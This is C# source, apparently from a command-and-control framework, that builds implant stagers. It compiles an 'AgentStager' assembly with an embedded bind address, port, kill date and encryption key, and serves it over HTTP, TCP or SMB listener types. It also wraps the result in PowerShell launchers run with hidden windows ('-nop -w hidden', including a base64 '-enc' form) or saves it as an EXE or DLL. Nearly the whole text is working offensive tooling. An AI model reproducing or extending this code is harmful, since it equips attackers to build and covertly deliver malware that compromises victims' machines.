public byte[] GenerateStager(TcpPayloadRequest request)
{
TempPath = CreateTempDirectory();
var compilerRequest = new Compiler.CompilationRequest
{
AssemblyName = "AgentStager",
OutputKind = (OutputKind)request.OutputType,
Platform = Platform.AnyCpu,
ReferenceDirectory = request.TargetFramework == TargetFramework.Net35 ? ReferencesDirectory + Path.DirectorySeparatorChar + "net35" : ReferencesDirectory + Path.DirectorySeparatorChar + "net40",
TargetDotNetVersion = (Compiler.DotNetVersion)request.TargetFramework,
SourceDirectory = TempPath,
References = new List <Compiler.Reference>
{
new Compiler.Reference
{
File = "mscorlib.dll",
Framework = (Compiler.DotNetVersion)request.TargetFramework,
Enabled = true
},
new Compiler.Reference
{
File = "System.dll",
Framework = (Compiler.DotNetVersion)request.TargetFramework,
Enabled = true
},
new Compiler.Reference
{
File = "System.Core.dll",
Framework = (Compiler.DotNetVersion)request.TargetFramework,
Enabled = true
},
new Compiler.Reference
{
File = "System.XML.dll",
Framework = (Compiler.DotNetVersion)request.TargetFramework,
Enabled = true
},
new Compiler.Reference
{
File = "System.Runtime.Serialization.dll",
Framework = (Compiler.DotNetVersion)request.TargetFramework,
Enabled = true
}
}
};
CloneAgentStagerSourceCode(Listener.Type, TempPath);
InsertBindAddress();
InsertBindPort();
InsertKillDate(request.KillDate);
InsertCryptoKey(Convert.ToBase64String(Program.ServerController.CryptoController.EncryptionKey));
var result = Compiler.Compile(compilerRequest);
RemoveTempDirectory(TempPath);
return(result);
}
public IActionResult GenerateTcpStager([FromBody] TcpPayloadRequest request)
{
var payload = Controllers.PayloadControllerBase.GenerateTcpAgent(request);
if (payload.Length > 0)
{
return(Ok(Convert.ToBase64String(payload)));
}
else
{
return(BadRequest());
}
}
public static async Task <byte[]> GenerateTcpStager(TcpPayloadRequest req)
{
var apiRequest = new RestRequest("/api/Payload/tcp", Method.POST);
apiRequest.AddParameter("application/json", JsonConvert.SerializeObject(req), ParameterType.RequestBody);
var apiResponse = await REST.Client.ExecuteAsync(apiRequest);
if (apiResponse.StatusCode == System.Net.HttpStatusCode.OK)
{
return(Convert.FromBase64String(apiResponse.Content.Replace("\"", "")));
}
else
{
return(new byte[] { });
}
}
private async void OnGeneratePayload(object obj)
{
var listener = Listeners.FirstOrDefault(l => l.ListenerName.Equals(SelectedListener.Split(":")[0].TrimEnd(), StringComparison.OrdinalIgnoreCase));
var req = new PayloadRequest();
switch (listener.ListenerType)
{
case ListenerType.HTTP:
req = new HttpPayloadRequest {
ListenerGuid = listener.ListenerGuid, SleepInterval = SleepInterval, SleepJitter = SleepJitter
};
break;
case ListenerType.TCP:
req = new TcpPayloadRequest {
ListenerGuid = listener.ListenerGuid
};
break;
case ListenerType.SMB:
req = new SmbPayloadRequest {
ListenerGuid = listener.ListenerGuid
};
break;
}
req.KillDate = KillDate;
if (SelectedFormat.Equals("PowerShell", StringComparison.OrdinalIgnoreCase) || SelectedFormat.Contains("EXE", StringComparison.OrdinalIgnoreCase))
{
req.OutputType = OutputType.Exe;
}
var window = new Window
{
Height = 100,
Width = 360,
WindowStartupLocation = WindowStartupLocation.CenterOwner,
Content = new ProgressBarView {
DataContext = new ProgressBarViewModel {
Label = "Building..."
}
}
};
window.Show();
var payload = new byte[] { };
switch (listener.ListenerType)
{
case ListenerType.HTTP:
payload = await PayloadAPI.GenerateHttpStager(req as HttpPayloadRequest);
break;
case ListenerType.TCP:
payload = await PayloadAPI.GenerateTcpStager(req as TcpPayloadRequest);
break;
case ListenerType.SMB:
payload = await PayloadAPI.GenerateSmbStager(req as SmbPayloadRequest);
break;
}
window.Close();
if (payload.Length > 0)
{
if (SelectedFormat.Equals("PowerShell", StringComparison.OrdinalIgnoreCase))
{
var launcher = PowerShellLauncher.GenerateLauncher(payload);
var encLauncher = Convert.ToBase64String(Encoding.Unicode.GetBytes(launcher));
var powerShellPayloadViewModel = new PowerShellPayloadViewModel
{
Launcher = $"powershell.exe -nop -w hidden -c \"{launcher}\"",
EncLauncher = $@"powershell.exe -nop -w hidden -enc {encLauncher}",
};
var powerShellPayloadView = new PowerShellPayloadView
{
DataContext = powerShellPayloadViewModel
};
powerShellPayloadView.Show();
}
else
{
var save = new SaveFileDialog();
if (SelectedFormat.Contains("EXE", StringComparison.OrdinalIgnoreCase))
{
save.Filter = "EXE (*.exe)|*.exe";
}
else if (SelectedFormat.Contains("DLL", StringComparison.OrdinalIgnoreCase))
{
save.Filter = "DLL (*.dll)|*.dll";
}
if ((bool)save.ShowDialog())
{
File.WriteAllBytes(save.FileName, payload);
}
}
}
View.Close();
}
public static byte[] GenerateTcpAgent(TcpPayloadRequest request)
{
var listener = GetListener(request.ListenerGuid);
var controller = new TcpPayloadController(listener as ListenerTcp);
return controller.GenerateStager(request);
}